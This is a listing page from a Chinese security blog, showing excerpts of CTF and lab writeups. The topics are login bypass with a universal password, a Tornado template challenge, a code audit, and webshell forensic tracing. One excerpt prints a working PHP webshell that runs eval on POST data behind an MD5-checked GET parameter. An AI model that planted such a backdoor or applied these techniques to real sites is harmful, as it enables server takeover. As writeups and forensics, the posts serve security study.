•   站长QQ3308757747
  •   官方Q群:1057658362

技术文章

  • 靶场实训

    靶场实训

    先看一下靶场这靶场有点老了,顺手尝试了一下万能密码就进去了上传就行了,今天又是水文章的一天...
  • 护网杯2018-easytornado writeup

    护网杯2018-easytornado writeup

    打开环境有三个文件根据题目我们能的得知他用的是tornado框架flag.txt提示flagin/fllllllllllllag我们尝试访问,报错了,可以知道他是通过filename和filehash两个参数来控制文件访问的所以需要获取filehash再看welcome.txt提示render再...
  • 记一次简单的代码审计

    记一次简单的代码审计

    题目附件里有源码,这个函数是判断输入数字与系统所取随随机数是否相同function buy($req){require_registered();require_min_money(2);$money = $_SESSION['money']...
  • webshell文件上传分析溯源

    webshell文件上传分析溯源

    dirbuster扫描目录发现几个有用的东东/admin/upload.php/admin/upload1.php/admin/upload2.php访问的时候最后都会跳转到/admin/upload2.php 前端没任何东西但是/admin/upload1.php会有一个弹窗,查看一下前...
  • 记一次简单的php溯源

    记一次简单的php溯源

    <?php if(md5(@$_GET['a'])==='4fe72a4d294138c2933ad35f5ab1dbbd'){@eval($_POST['x']);} ?>文件是这样的,可以看到if判断get传进来的参...
歌曲 - 歌手
0:00